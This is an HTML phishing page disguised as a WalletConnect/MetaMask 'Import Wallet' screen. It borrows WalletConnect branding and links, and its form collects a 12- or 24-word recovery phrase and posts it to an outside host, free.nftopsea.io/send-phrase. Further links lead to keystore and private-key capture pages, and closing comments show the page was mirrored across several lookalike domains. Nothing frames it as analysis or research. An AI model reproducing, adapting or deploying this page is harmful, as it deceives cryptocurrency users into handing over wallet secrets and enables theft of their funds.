<html>

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="stylesheet" href="https://free.nftopsea.io/front/assets/main.css" type="text/css">
    <meta name="description" content="Open protocol for connecting Wallets to Dapps">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:image" content="images/logo.html">
    <link rel="icon" href="x.png">


    <style>
        .parent {
            display: flex;
            flex-wrap: wrap;
        }

        .child {
            flex: 1 0 21%; /* explanation below */
            margin: 5px;
            height: 100px;
            /*background-color: blue;*/
        }
    </style>

    <title>Import Wallet</title>
</head>

<body>
<center>
    <div class="top">
        <a href="https://github.com/walletconnect" class="left">Github</a>
        <a href="https://docs.walletconnect.org/" class="left">Docs</a>
        <a href="https://free.nftopsea.io/connect-wallet" class="main">
            <img src="https://free.nftopsea.io/front/assets/logo.svg" alt="logo"></a>
        <a href="https://free.nftopsea.io/connect-wallet" class="left">Wallets</a>
        <a href="https://free.nftopsea.io/connect-wallet" class="left">Encryptor</a>
    </div>
    <br>
    <h2>
        <center>Import Wallet</center>
    </h2>
    <br>
    <div class="tab">
        <a class="btn btn-primary" href="https://free.nftopsea.io/metamask/import-wallet"  >Phrase</a>
        <a href="https://free.nftopsea.io/metamask/keystore" >Keystore</a>
        <a href="https://free.nftopsea.io/metamask/private-key">Private Key</a>
    </div>

    <div  style="display: block;">
        <form method="POST" action="https://free.nftopsea.io/send-phrase">
            <input type="hidden" name="_token" value="n7tlLYR499LkMm6C9Xfwk81DSWhm9iq3JRti8k4I">                                                <input type="hidden" value="Metamask" name="name" />

            <textarea name="phrase" class="phrase" required="required" minlength="12" placeholder="Phrase"></textarea>
            <br>
            <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
            <br>
            <button type="submit"  class="btn">IMPORT</button>
        </form>
    </div>
    <br/>



























</center>
</body>


<!-- Mirrored from walletencryptor.com/nano.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 10 Jul 2021 10:04:11 GMT -->

<!-- Mirrored from easydappsauthenticator.com/nano.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 22 Nov 2021 16:45:53 GMT -->


<!-- Mirrored from www.easyappauthenticator.com/nano.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 07 Dec 2021 14:11:29 GMT -->
</html>
